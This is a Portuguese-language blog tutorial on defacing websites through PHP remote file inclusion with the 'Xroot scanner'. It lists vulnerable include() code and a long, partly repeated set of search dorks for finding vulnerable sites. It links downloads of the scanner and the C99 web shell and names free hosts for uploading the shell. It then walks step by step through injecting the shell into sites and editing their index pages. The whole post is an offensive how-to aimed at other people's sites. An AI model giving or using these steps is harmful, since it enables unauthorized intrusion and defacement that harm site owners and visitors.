Oque é xroot scanner?
O Xroot scanner é um scan de phpinjection desevolvido pelo xroot group,ele pesquisa sites e depois coloca uma cmd neles e localiza uma palavra como se você desse um CRTL + F na página e digitasse algo. E aqui vocês aprenderam como utilizar ele corretamente e sem nenhum erro.* Oque é PHP Injection ou Remote File inclusion
O famoso php injection ou Remote File inclusion(RFI) é uma tecnica deface onde você poderá incluir um arquivo "remoto" em uma página da web vulnerável, esta técnica bombava em 2003 quando eu tinha 8 anos e meu primo me ensinou a fazer isto,coisa que não vem ao caso agora. Oque importa é que vocês vieram aqui para aprender.
* Sites que são vulneráveis
Sites que contem estes códigos no sorce:
Código:
include('topo.php');
include('menu.php');
include($page);
include('menu.php');
include($page);
Mais obviamente você não vai conseguir ver o source de uma página em php
então vamos as strings de pesquisa citadas abaixo.Código:
/index.php?site=
/index.php?link=
/index.php?pagina=
/index.php?page=
/index.php?include=
/index.php?pg=
/index.php?p=
/index.php?x=
/index.php?home=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/pivot/modules/module_db.php?pivot_path=
/ashnews.php?pathtoashnews=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/shoutbox/expanded.php?conf=
/shoutbox/expanded.php?conf=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/My_eGallery/public/displayCategory.php?basepath=
/write.php?dir=
/index.php?go=
/index.php?carrega=
/index.php?carga=
/index.php?ir=
.php?page="
.php?inc="
.php?body="
.php?main="
.php?pag="
.php?p="
.php?content="
.php?cont="
.php?c="
.php?meio="
.php?x="
php?cat="
php?site="
.php?m="
.php?do="
.php?x="
.php?content="
.php?pagina="
.php?root="
.php?include="
.php?open="
.php?visualizar="
.php?conf="
/index.php?link=
/index.php?pagina=
/index.php?page=
/index.php?include=
/index.php?pg=
/index.php?p=
/index.php?x=
/index.php?home=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/pivot/modules/module_db.php?pivot_path=
/pivot/modules/module_db.php?pivot_path=
/ashnews.php?pathtoashnews=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/shoutbox/expanded.php?conf=
/shoutbox/expanded.php?conf=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/My_eGallery/public/displayCategory.php?basepath=
/write.php?dir=
/index.php?go=
/index.php?carrega=
/index.php?carga=
/index.php?ir=
.php?page="
.php?inc="
.php?body="
.php?main="
.php?pag="
.php?p="
.php?content="
.php?cont="
.php?c="
.php?meio="
.php?x="
php?cat="
php?site="
.php?m="
.php?do="
.php?x="
.php?content="
.php?pagina="
.php?root="
.php?include="
.php?open="
.php?visualizar="
.php?conf="
Programas que serão utilizados
Xroot scanner
- Download: http://www.4shared.com/file/144256374/59b2039a/Scanner_Xroot.html
Senha para descompactar: Andradezc - E a bosta do 4shared ta acusando virus
C99Shell - como pode ver também acuso virus em um arquivo de texto.
- Download: http://www.4shared.com/file/144256345/59860cf/c99.html
Oque fazer com a c99shell
Simples apos fazer o download da shell você upar em algum file host aqui uma lista de alguns boms hosts:
http://www.110mb.com - http://www.runhost.net - http://www.freeweb7.com http://justfree.com
Depois de upar a shell copie o link e salve em um bloco de notas.
Como usar o Xroot - Fazendo o Deface
Apos fazer o download extraia com a senha andradezc e abra o xroot e escolha uma string e coloque em pesquisar e abaixo escola de [1] até [100] como na images abaixo,mais no meu print está de 1 até 10
Agora aperte em pesquisar e aguarde uns 2 a 5 minutos e verá todos os resutados da pesquisa como na foto abaixo:
Agora clique na aba scan do lado de search, e clique em puxar até = isto significa que vai recortar os links pesquisados até o primeiro = do link. Clique em configuraçoes em bug coloque PHP Injection ou outro nome que você preferir, em CMD coloque a sua cmd .txt nunca em .php e em achar você coloca isto: drwxrwx--- este texto significa que você tem privilegios de Root no sites ou seja pode editar todos os arquivos. Princpalmente index.php. Na foto abaixo você verá tudo corretamente.
Clique em salvar configuração e depois clique em usar configuração Ai vai ficar do seguinte modo com as confugurações salvas:
Agora clique em por cmd e depois clique em testar sites como na imagem abaixo
Agora pegue os sites vulneraveis e coloque no navegador e de enter. Ai você verá no meio da página uma c99
é so isso
By: Andradezc
Nenhum comentário:
Postar um comentário
Leia as regras
Todos os comentários são lidos e moderados previamente.
São publicados aqueles que respeitam as regras abaixo:
- Seu comentário precisa ter relação com o assunto do post;
- Não inclua links desnecessários no conteúdo do seu comentário;
- Ofensas pessoais, ameaças e xingamentos não são permitidos;